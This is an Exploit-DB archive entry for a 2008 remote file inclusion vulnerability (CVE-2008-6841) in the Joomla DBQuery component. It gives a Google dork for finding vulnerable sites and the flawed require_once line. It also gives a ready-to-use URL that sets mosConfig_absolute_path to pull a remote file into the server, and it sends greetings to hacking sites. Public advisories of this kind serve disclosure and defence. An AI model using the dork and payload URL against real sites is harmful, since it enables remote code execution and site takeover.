Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability

2008-07-04T00:00:00
ID EDB-ID:6003
Type exploitdb
Reporter SsEs
Modified 2008-07-04T00:00:00

Description

Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability. CVE-2008-6841. Webapps exploit for php platform

                                        
                                            @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@JOOmla com_dbquery Remote file Inclusion@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ 			Author:SsEs 				  
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ 			Contact:h4cks.in@gmail.com		  
@@@@@@@@@@@@@@@@@ 		Greetss: www.h4cks.in ||| www.1919turk.org || www.illegalsecurity.us ||| www.siberaskerler.org ||
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ Dork: inurl:"com_dbquery" OR "index.php?option=com_dbquery"
@@@@@@@@@@@@@@@@@ **Bug:
@@@@@@@@@@@@@@@@@ administrator\components\com_dbquery\classes\DBQ\admin\common.class.php on line 6
@@@@@@@@@@@@@@@@@ global $mosConfig_absolute_path;
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ require_once($mosConfig_absolute_path.’/components/com_dbquery/classes/DBQ/common.class.php’);
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ http://sitename.com/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
@@@@@@@@@@@@@@@@@

side note:
	&lt;name&gt;DBQuery&lt;/name&gt;
	&lt;creationDate&gt;February 2007&lt;/creationDate&gt;
	&lt;author&gt;Green Mountain Information Technology Consulting&lt;/author&gt;
	&lt;copyright&gt;This component is released under the GNU/GPL License&lt;/copyright&gt;
	&lt;authorEmail&gt;consulting@gmitc.biz&lt;/authorEmail&gt;

	&lt;authorUrl&gt;http://www.gmitc.biz&lt;/authorUrl&gt;
	&lt;version&gt;1.4.1 Final&lt;/version&gt;
	&lt;description&gt;Database Query is a Joomla query manager.&lt;/description&gt;

# milw0rm.com [2008-07-04]